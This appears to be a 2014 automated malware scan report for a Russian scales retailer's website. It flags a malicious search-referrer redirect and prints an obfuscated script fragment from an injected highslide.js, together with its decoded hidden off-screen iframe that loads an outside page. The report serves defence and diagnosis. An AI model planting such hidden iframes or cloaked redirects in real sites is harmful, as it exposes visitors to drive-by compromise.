Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://promserviss.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: promserviss.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 28 May 2014 10:23:04 GMT Location: http://decmexico.com/includes/domit/1.php Server: nginx/1.2.2 Content-Type: text/html; charset=windows-1251 X-Powered-By: PHP/5.2.10 | malicious |
Scanned pages/files
Request | Server response | Status |
http://promserviss.ru/ | 200 OK Content-Length: 20246 Content-Type: text/html | clean |
http://promserviss.ru/engine/classes/js/jquery.js | 200 OK Content-Length: 1623 Content-Type: application/x-javascript | clean |
http://promserviss.ru/engine/classes/js/jqueryui.js | 200 OK Content-Length: 1634 Content-Type: application/x-javascript | clean |
http://promserviss.ru/engine/classes/js/dle_js.js | 200 OK Content-Length: 22719 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js | 200 OK Content-Length: 17380 Content-Type: text/javascript | clean |
http://promserviss.ru/engine/editor/scripts/webfont.js | 200 OK Content-Length: 4691 Content-Type: application/x-javascript | clean |
http://promserviss.ru/templates/remaket/js/libs.js | 200 OK Content-Length: 1634 Content-Type: application/x-javascript | clean |
http://promserviss.ru/templates/remaket/js/jcarousellite.js | 200 OK Content-Length: 1634 Content-Type: application/x-javascript | clean |
http://promserviss.ru/o-kompanii.html | 200 OK Content-Length: 16174 Content-Type: text/html | clean |
http://promserviss.ru/engine/classes/highslide/highslide.js | 200 OK Content-Length: 48331 Content-Type: application/x-javascript | suspicious |
Suspicious code. Script contains iFrame.
(function(){ function stripos (r_haystack, r_needle, r_offset) { var haystack = (r_haystack + '').toLowerCase(); var needle = (r_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, r_offset)) !== -1) { return index; } return false; } function browserData(){ var BrowserBlock = ['Series60','Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','N ...[50520 bytes skipped]...
Decoded script:
function () { if (!hs.isReady) { hs.isReady = true; for (var a = 0; a < hs.onReady.length; a++) { hs.onReady[a](); } } }
function () { hs.getPageSize(); if (hs.viewport) { for (var a = 0; a < hs.viewport.childNodes.length; a++) { var b = hs.viewport.childNodes[a]; hs.getExpander(b).positionOverlay(b); } } }
<iframe src="http://posimak.tetsuya-dragneel.net/trjgfxzstjarhrdhhej12.html" Name="Position" style="position:absolute;left:-1370px;top:-1370px;" height="160" width="160"></iframe>
http://promserviss.ru/servisnoe-obsluzhivanie.html | 200 OK Content-Length: 15247 Content-Type: text/html | clean |
http://promserviss.ru/kredit.html | 200 OK Content-Length: 16240 Content-Type: text/html | clean |
http://promserviss.ru/kontakty.html | 200 OK Content-Length: 14242 Content-Type: text/html | clean |
http://promserviss.ru/massa-k/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 28 May 2014 10:23:08 GMT Pragma: no-cache Location: /elektronnye-vesy/massa-k/ Server: nginx/1.2.2 Content-Type: text/html; charset=windows-1251 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=312dc87511f68544dee459642175feaf; path=/ Set-Cookie: dle_user_id=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly Set-Cookie: dle_password=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly Set-Cookie: dle_hash=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly X-Powered-By: PHP/5.2.10 | clean |
http://promserviss.ru/elektronnye-vesy/massa-k/ | 200 OK Content-Length: 16594 Content-Type: text/html | clean |
http://promserviss.ru/cas/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Wed, 28 May 2014 10:23:08 GMT Pragma: no-cache Location: /elektronnye-vesy/cas/ Server: nginx/1.2.2 Content-Type: text/html; charset=windows-1251 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=b0088a62558a2aace6939abe541aada6; path=/ Set-Cookie: dle_user_id=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly Set-Cookie: dle_password=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly Set-Cookie: dle_hash=deleted; expires=Tue, 28-May-2013 10:23:07 GMT; path=/; domain=.promserviss.ru; httponly X-Powered-By: PHP/5.2.10 | clean |
http://promserviss.ru/elektronnye-vesy/cas/ | 200 OK Content-Length: 15087 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=promserviss.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://promserviss.ru/
Result: promserviss.ru is not infected or malware details are not published yet.